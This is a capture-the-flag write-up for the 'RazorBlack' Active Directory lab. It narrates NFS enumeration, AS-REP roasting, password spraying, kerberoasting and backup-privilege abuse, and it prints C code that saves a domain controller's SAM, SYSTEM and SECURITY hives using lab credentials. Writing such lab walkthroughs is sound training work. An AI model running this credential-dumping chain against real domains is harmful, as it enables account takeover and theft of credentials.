⚫RazorBlack

This will test your Active Directory enumeration and exploitation knowledge.

IP

10.10.4.34

Enumeration

Nmap scan uncovers a Domain controller with hostname HAVEN-DC.raz0rblack.thm

We do not have much to work with, credentials are required to query the ldap server, no SMB shares and we only have RPC left

Here we can see that nfs is mentioned and maybe the server is sharing a directory

It's sharing the Users directory

We can mount the directory

And we get two files

The txt file is the flag for the user sbradley and the excel file is a list of users

Now we can create a list of users and check if they are valid

Not all are good but twilliams does not require preauth and we get a asrep ticket to crack

For some reason hashcat cannot crack this, we can try GetNPUsers from impacket

This time it cracked the hash

Now we can see a new share

But we do not have permission to list files on it, If we try to spray the password with the userlist we notice that sbradley's password needs to be changed

Now we can list the files in the share

The chatlog it's really funny i must say

Now we try to crack the zip file

Now we can extract the hashes but we get a ton of them, for a lot of users

We put all the hashes in a file and spray for all the users

We now have a WinRM shell

Now we can try to see if there are any kerberoastable accounts

And we can crack it

I only noticed now that there is a .xml file containing the flags for each account

To get the flags we can do this

Privilege Escalation

The privesc is pretty easy

This user has SeBackupPrivilege and SeRestorePrivilege because is a backup operator

And from this we can extract the sam, system and security hive to DCSync the DC

This code is used to copy the hives to C:\Windows\Temp

#include <stdio.h>
#include <Windows.h>

void MakeToken() {
    HANDLE token;
    const char username[] = "xyan1d3";
    const char password[] = "cyanide9amine5628";
    const char domain[] = "raz0rblack.thm";

    if (LogonUserA(username, domain, password, LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_DEFAULT, &token) == 0) {
        printf("LogonUserA: %d\n", GetLastError());
        exit(0);
    }
    if (ImpersonateLoggedOnUser(token) == 0) {
        printf("ImpersonateLoggedOnUser: %d\n", GetLastError());
        exit(0);
    }
}

int main()
{
    HKEY hklm;
    HKEY hkey;
    DWORD result;
    const char* hives[] = { "SAM","SYSTEM","SECURITY" };
    const char* files[] = { "C:\\windows\\temp\\sam.hive","C:\\windows\\temp\\system.hive","C:\\windows\\temp\\security.hive" };

    MakeToken();

    result = RegConnectRegistryA("\\\\HAVEN-DC.raz0rblack.thm", HKEY_LOCAL_MACHINE, &hklm);
    if (result != 0) {
        printf("RegConnectRegistryW: %d\n", result);
        exit(0);
    }
    for (int i = 0; i < 3; i++) {

        printf("Dumping %s hive to %s\n", hives[i], files[i]);
        result = RegOpenKeyExA(hklm, hives[i], REG_OPTION_BACKUP_RESTORE | REG_OPTION_OPEN_LINK, KEY_READ, &hkey);
        if (result != 0) {
            printf("RegOpenKeyExA: %d\n", result);
            exit(0);
        }
        result = RegSaveKeyA(hkey, files[i], NULL);
        if (result != 0) {
            printf("RegSaveKeyA: %d\n", result);
            exit(0);
        }
    }
}

Then download the files, use smbclient is way faster

Then extract the hashes and DCSync the DC

To get the root flag copy the password field of root.xml and decode from hex in cyberchef

To the Tyson's flag use command in his user directory

type .\definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_not_a_flag.exe

In the program files directory there is a Top Secret folder containing an image with the last question of the room